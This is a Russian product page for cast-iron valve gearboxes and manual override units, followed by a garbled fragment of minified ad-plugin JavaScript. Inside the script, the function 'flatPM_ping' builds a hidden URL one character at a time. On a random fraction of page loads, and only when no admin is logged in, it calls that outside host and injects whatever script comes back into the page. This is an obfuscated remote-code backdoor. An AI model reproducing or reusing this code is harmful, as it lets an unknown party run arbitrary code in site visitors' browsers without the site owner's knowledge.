К и R серии разработаны для работы с многооборотными кранами и демпферами. Так же модели этой серии герметизированы в соответствии с IP 68. Все модели изготавливаются с чугунными компонентами корпуса и естественно все модели отличаются высококачественными упорными подшипниками, нержавеющим входным валом и полиуретановым покрытием. Кроме того, продукты серий K и R полностью соответствуют AWWA.

Продукты К и R серий это коническая зубчатая передача и прямозубая цилиндрическая зубчатая передача с полностью защищёнными шпинделем и механизмом, которые уплотнены в соответствии с IP 68. Все модели отличаются полиуретановым покрытием, высококачественными упорными подшипниками и нержавеющим входным валом.

Бронзовая передача легко снимается, что позволяет обрабатывать её и тем самым производить подгон под шток крана. Продукция подходит для ручного управления клиновых, шиберных задвижек, вентилей и промышленных заслонок.

Редукторы дынных серий являются подходящим решением и обеспечивают высочайшую надёжность в химической промышленности, энергетике, отоплении , вентиляции, кондиционировании воздуха, водоснабжении и промышленности по утилизации отходов. Как дополнительную опцию клиенту могут быть предложены выходные фланцы, соответствующие стандарту ISO.

• Дублеры серии MOD — чугунные приводы-дублеры
MO-D серия представляет собой прочные, надёжные, технологичные изделия, корпус которых выполнен из чугуна. Все модели этой серии отличаются высококачественными подшипниками и качественным полиуретановым покрытием.

Серия «MO-D» специально разработана для ручного управления арматурой, которая оборудованы пневматическими или гидравлическими приводами. MO-D серия обеспечивает расцепление для использования в тех производствах, где необходимо надежное функционирование пневмоприводов двойного действия и с пружинным возвратом, а так же гидроприводов.

Все редукторы, которые должны быть между краном и приводом поставляются с (заменяемыми) монтажными фланцами для удобства использования. Более того, все редукторы могут быть оснащены приводным валом, выполненным по ISO , соединяющим привод с краном. Опционально на корпус может быть оборудован 3/2 выпускной клапан для того, чтобы автоматически выпускать воздушное давление из привода, когда используется ручное управление.

За более подробной информации просьба обращаться в отдел продаж.

Делая заказ, уточните:

1. Какой у вас шток?

2. Размер штока для присоединения;

2. Нужен просто редуктор или комлект (комлект поставляется в сборе со штурвалом, переходным фланцем и нужной муфтой). Также есть муфты без обработанного отверстия для самостоятельной обработки;

4. Размер присоединительного фланца;

5. Температура внешней среды: до — 25ºC или до — 45ºC.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика